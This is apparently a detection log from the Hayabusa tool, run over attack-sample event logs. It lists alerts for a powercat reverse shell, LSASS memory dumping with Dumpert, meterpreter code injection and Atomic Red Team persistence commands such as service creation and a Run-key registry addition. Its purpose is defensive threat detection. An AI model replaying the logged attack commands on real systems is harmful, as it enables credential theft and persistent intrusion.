powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:48.925 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:52.956 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""cmd""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:52.956 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:52.956 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:58.816 +09:00,IEWIN7,1,informational,Process Creation,"Command: systeminfo : Path: C:\Windows\System32\systeminfo.exe : User: IEWIN7\IEUser : Parent Command: ""cmd""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-21 16:35:37.185 +09:00,alice.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: Outflank-Dumpert.exe : Path: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:37.377 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:50.128 +09:00,alice.insecurebank.local,1,informational,Process Creation,"Command: rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump : Path: C:\Windows\System32\rundll32.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:50.264 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:50.749 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:36:50.450 +09:00,alice.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: AndrewSpecial.exe : Path: C:\Users\administrator\Desktop\AndrewSpecial.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:36:51.682 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-07-04 05:39:29.223 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.254 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\notepad.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.254 +09:00,IEWIN7,1,high,Rundll32 Without Parameters,,rules/sigma/process_creation/win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.254 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:PowerShell/Powersploit.M : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:XML/Exeselrun.gen!A : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: HackTool:JS/Jsprat : Severity: High : Type: Tool : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Backdoor:ASP/Ace.T : Severity: Severe : Type: Backdoor : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:Win32/Sehyioa.A!cl : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:51:50.275 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: HackTool:JS/Jsprat : Severity: High : Type: Tool : User: MSEDGEWIN10\IEUser : Path: containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:53:31.900 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:53:31.902 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:53:31.952 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 23:42:51.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 4516 288 0000023C0CA21C70 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:42:53.295 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:08.161 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:08.161 +09:00,-,-,low,Quick Execution of a Series of Suspicious Commands,[condition] count() by MachineName > 5 in timeframe [result] count:21 MachineName:null timeframe:5m,rules/sigma/process_creation/win_multiple_suspicious_cli.yml,- -2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,low,New Service Creation,,rules/sigma/process_creation/win_new_service_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:08.268 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:08.288 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe start AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:08.307 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:09.150 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe stop AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,low,Stop Windows Service,,rules/sigma/process_creation/win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:09.253 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:09.278 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe delete AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:09.351 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:32.101 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" : Path: C:\Windows\System32\cmd.exe : User: 